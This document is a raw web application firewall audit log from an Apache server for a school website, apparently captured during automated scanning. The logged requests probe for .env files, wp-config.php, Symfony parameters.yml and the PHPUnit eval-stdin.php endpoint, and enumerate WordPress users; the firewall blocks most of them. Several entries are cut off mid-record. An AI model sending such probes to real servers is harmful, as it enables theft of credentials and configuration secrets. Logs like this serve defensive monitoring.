Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 OPR/44.0.2510.857 --60c3ea2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60c3ea2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792780908878 913 (- - -) Stopwatch2: 1746792780908878 913; combined=402, p1=362, p2=0, p3=0, p4=0, p5=40, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60c3ea2b-Z-- --63951c2d-A-- [09/May/2025:19:13:04 +0700] aB3xUB6q_ZMebht3q14bbAAAAJU 103.236.140.4 53734 103.236.140.4 8181 --63951c2d-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe --63951c2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63951c2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792784073697 805 (- - -) Stopwatch2: 1746792784073697 805; combined=319, p1=279, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63951c2d-Z-- --3aab5934-A-- [09/May/2025:19:13:07 +0700] aB3xU1qQ1nOVx9fWpZSm1AAAAAs 103.236.140.4 53736 103.236.140.4 8181 --3aab5934-B-- GET /admin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36 --3aab5934-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3aab5934-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792787285858 815 (- - -) Stopwatch2: 1746792787285858 815; combined=356, p1=318, p2=0, p3=0, p4=0, p5=38, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3aab5934-Z-- --ea19f636-A-- [09/May/2025:19:13:08 +0700] aB3xVFqQ1nOVx9fWpZSm1QAAAAQ 103.236.140.4 53738 103.236.140.4 8181 --ea19f636-B-- GET /backend/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.5) Gecko/20060911 SUSE/2.0.0.5-1.2 Firefox/2.0.0.5 --ea19f636-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea19f636-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792788275927 649 (- - -) Stopwatch2: 1746792788275927 649; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea19f636-Z-- --23e6ea4a-A-- [09/May/2025:19:13:09 +0700] aB3xVVqQ1nOVx9fWpZSm1gAAABQ 103.236.140.4 53740 103.236.140.4 8181 --23e6ea4a-B-- GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3 --23e6ea4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23e6ea4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792789680016 963 (- - -) Stopwatch2: 1746792789680016 963; combined=444, p1=402, p2=0, p3=0, p4=0, p5=42, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23e6ea4a-Z-- --92157b76-A-- [09/May/2025:19:13:13 +0700] aB3xWVqQ1nOVx9fWpZSm1wAAAAE 103.236.140.4 53744 103.236.140.4 8181 --92157b76-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; WebMoney Advisor) --92157b76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92157b76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792793098973 682 (- - -) Stopwatch2: 1746792793098973 682; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92157b76-Z-- --c339b704-A-- [09/May/2025:19:51:49 +0700] aB36ZR6q_ZMebht3q14bcwAAAJA 103.236.140.4 54878 103.236.140.4 8181 --c339b704-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.227.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.227.246 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --c339b704-C-- --c339b704-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c339b704-E-- --c339b704-H-- Message: Access denied with code 403 (phase 2). String match " --0daaa73d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0daaa73d-E-- --0daaa73d-H-- Message: Access denied with code 403 (phase 2). String match " --3d03ba66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d03ba66-E-- --3d03ba66-H-- Message: Access denied with code 403 (phase 2). String match " --e23b4c44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e23b4c44-H-- Message: Access denied with code 403 (phase 2). String match " --3da0e22d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3da0e22d-E-- --3da0e22d-H-- Message: Access denied with code 403 (phase 2). String match " --40714e79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40714e79-E-- --40714e79-H-- Message: Access denied with code 403 (phase 2). String match " --d1f9a965-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1f9a965-H-- Message: Access denied with code 403 (phase 2). String match " --3a40ee3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a40ee3e-E-- --3a40ee3e-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --1883631e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1883631e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746798246017209 5451 (- - -) Stopwatch2: 1746798246017209 5451; combined=4162, p1=545, p2=3234, p3=22, p4=26, p5=180, sr=143, sw=155, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1883631e-Z-- --cb05fc6c-A-- [09/May/2025:20:49:21 +0700] aB4H4S-fAO47ojYKsMryJQAAAEE 103.236.140.4 55230 103.236.140.4 8181 --cb05fc6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.107.22.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.107.22.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb05fc6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb05fc6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746798561231195 3285 (- - -) Stopwatch2: 1746798561231195 3285; combined=1420, p1=472, p2=916, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb05fc6c-Z-- --fa4fd541-A-- [09/May/2025:20:52:57 +0700] aB4IuR6q_ZMebht3q14bjQAAAII 103.236.140.4 55258 103.236.140.4 8181 --fa4fd541-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 15.235.212.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 15.235.212.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fa4fd541-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa4fd541-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746798777476985 3571 (- - -) Stopwatch2: 1746798777476985 3571; combined=1599, p1=617, p2=951, p3=0, p4=0, p5=31, sr=187, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa4fd541-Z-- --e327250c-A-- [09/May/2025:20:54:02 +0700] aB4I-lqQ1nOVx9fWpZSoXAAAAAA 103.236.140.4 55264 103.236.140.4 8181 --e327250c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e327250c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e327250c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746798842879037 2862 (- - -) Stopwatch2: 1746798842879037 2862; combined=1275, p1=453, p2=791, p3=0, p4=0, p5=30, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e327250c-Z-- --d8bf7e3e-A-- [09/May/2025:20:54:07 +0700] aB4I_y-fAO47ojYKsMryKgAAAFg 103.236.140.4 55270 103.236.140.4 8181 --d8bf7e3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d8bf7e3e-C-- demo.sayHello --d8bf7e3e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8bf7e3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746798847619628 4881 (- - -) Stopwatch2: 1746798847619628 4881; combined=3708, p1=452, p2=3058, p3=22, p4=24, p5=90, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8bf7e3e-Z-- --521c4c41-A-- [09/May/2025:20:56:39 +0700] aB4Jlx6q_ZMebht3q14dgAAAAJE 103.236.140.4 58318 103.236.140.4 8181 --521c4c41-B-- GET /wp-config.php HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 213.209.143.92 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 213.209.143.92 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36 Accept: */* --521c4c41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --521c4c41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746798999994226 815 (- - -) Stopwatch2: 1746798999994226 815; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --521c4c41-Z-- --9cb11d1e-A-- [09/May/2025:21:06:45 +0700] aB4L9S-fAO47ojYKsMr14wAAAE4 103.236.140.4 40060 103.236.140.4 8181 --9cb11d1e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9cb11d1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cb11d1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746799605107459 2406 (- - -) Stopwatch2: 1746799605107459 2406; combined=1359, p1=422, p2=908, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb11d1e-Z-- --5884b54f-A-- [09/May/2025:21:06:53 +0700] aB4L_VoC-7ITMWTA_c9aWAAAANQ 103.236.140.4 40416 103.236.140.4 8181 --5884b54f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.154 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5884b54f-C-- demo.sayHello --5884b54f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5884b54f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746799613271506 5606 (- - -) Stopwatch2: 1746799613271506 5606; combined=4031, p1=551, p2=3277, p3=34, p4=37, p5=79, sr=66, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5884b54f-Z-- --04876c3a-A-- [09/May/2025:21:11:42 +0700] aB4NHh6q_ZMebht3q14jHgAAAJg 103.236.140.4 51128 103.236.140.4 8181 --04876c3a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04876c3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04876c3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746799902311170 2804 (- - -) Stopwatch2: 1746799902311170 2804; combined=1378, p1=476, p2=867, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04876c3a-Z-- --9294b622-A-- [09/May/2025:21:11:47 +0700] aB4NIx6q_ZMebht3q14jHwAAAIw 103.236.140.4 51132 103.236.140.4 8181 --9294b622-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9294b622-C-- demo.sayHello --9294b622-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9294b622-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746799907001158 6622 (- - -) Stopwatch2: 1746799907001158 6622; combined=5006, p1=675, p2=4098, p3=34, p4=32, p5=97, sr=114, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9294b622-Z-- --f970706f-A-- [09/May/2025:21:14:00 +0700] aB4NqFqQ1nOVx9fWpZSv-QAAABE 103.236.140.4 54394 103.236.140.4 8181 --f970706f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f970706f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f970706f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800040540903 3794 (- - -) Stopwatch2: 1746800040540903 3794; combined=1173, p1=381, p2=756, p3=0, p4=0, p5=35, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: 